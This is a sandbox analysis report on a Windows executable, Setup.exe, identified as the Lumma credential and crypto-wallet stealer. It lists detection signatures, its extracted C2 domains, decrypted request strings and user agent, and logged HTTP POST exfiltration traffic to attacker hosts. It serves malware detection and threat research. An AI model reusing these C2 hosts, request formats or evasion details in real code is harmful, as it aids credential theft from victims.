Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1583039
MD5: abda8cea9c2d8bc35847d4d189f61f2e
SHA1: ce38f933a30778130b53792109531056dfe7c03c
SHA256: 844b0fdfa66fd6d10179b74ae064c30624581a833bf1eb759e03fd2c664bae03
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: ABDA8CEA9C2D8BC35847D4D189F61F2E)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration (LummaC):
{"C2 url": ["framekgirus.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "wholersorie.shop", "nearycrepso.shop", "locketsashayz.click", "cloudewahsj.shop", "rabidcowse.shop"], "Build id": "hRjzG3--TRON"}
Yara matches (PCAP):

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Yara matches (memory dumps and process memory):

Source | Rule | Description | Author | Strings
00000000.00000002.4139966079.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x4dd79:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Setup.exe PID: 6984 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Setup.exe PID: 6984 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Setup.exe PID: 6984 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T16:56:21.916765+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:23.166077+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:24.615969+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:25.800459+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:31.060448+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:33.202102+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:34.766559+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:36.458976+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:38.632283+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:39.907939+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 185.161.251.21 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T16:56:22.676192+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:23.640646+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:39.103074+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T16:56:22.676192+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T16:56:23.640646+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T16:56:35.522155+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | TCP

AV Detection

Source: https://cegu.shop/ | Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtks | Avira URL Cloud: Label: malware
Source: https://cegu.shop/Q | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txt)E | Avira URL Cloud: Label: malware
Source: https://cegu.shop/I | Avira URL Cloud: Label: malware
Source: https://cegu.shop/5 | Avira URL Cloud: Label: malware
Source: Setup.exe.6984.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["framekgirus.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "wholersorie.shop", "nearycrepso.shop", "locketsashayz.click", "cloudewahsj.shop", "rabidcowse.shop"], "Build id": "hRjzG3--TRON"}
Source: Setup.exe | Virustotal: Detection: 8%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.9% probability
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rabidcowse.shop
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: noisycuttej.shop
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tirepublicerj.shop
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: framekgirus.shop
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wholersorie.shop
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: abruptyopsn.shop
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: nearycrepso.shop
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: locketsashayz.click
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: hRjzG3--TRON
Source: Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: E:\AWork\_drw_main\DRWIntelligentScan\bin\Release\Win32\EUImgRepair.pdb source: Setup.exe
Source: Binary string: E:\AWork\_drw_main\DRWIntelligentScan\bin\Release\Win32\EUImgRepair.pdbOO+GCTL source: Setup.exe
Source: C:\Users\user\Desktop\Setup.exe | Directory queried: number of queries: 1001

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: locketsashayz.click
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 185.161.251.21
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 185.161.251.21:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: locketsashayz.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 78 | Host: locketsashayz.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=GJEOV9UC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18102 | Host: locketsashayz.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=O6L9KZCKEJV7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8747 | Host: locketsashayz.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9MWOJXU86N | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20388 | Host: locketsashayz.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2W9N2HEFM8I | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 3779 | Host: locketsashayz.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=8YUU28F3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1204 | Host: locketsashayz.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=IALSNE3Y | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 549614 | Host: locketsashayz.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 113 | Host: locketsashayz.click
Source: global traffic | HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
Source: global traffic | DNS traffic detected: DNS query: locketsashayz.click
Source: global traffic | DNS traffic detected: DNS query: cegu.shop
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: locketsashayz.click
Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944587341.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959265174.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605662760.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Setup.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: Setup.exe | String found in binary or memory: http://ocsp.digicert.com0X
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Setup.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/
Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/5
Source: Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/8574262446/ph.txtks
Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/I
Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/Q
Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Setup.exe, 00000000.00000002.4139812014.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4140538030.000000000413A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605662760.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139549503.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt)E
Source: Setup.exe, 00000000.00000002.4139549503.0000000001419000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/
Source: Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/0000Z0o
Source: Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/0R
Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/H
Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/M
Source: Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/api
Source: Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locketsashayz.click/api.I
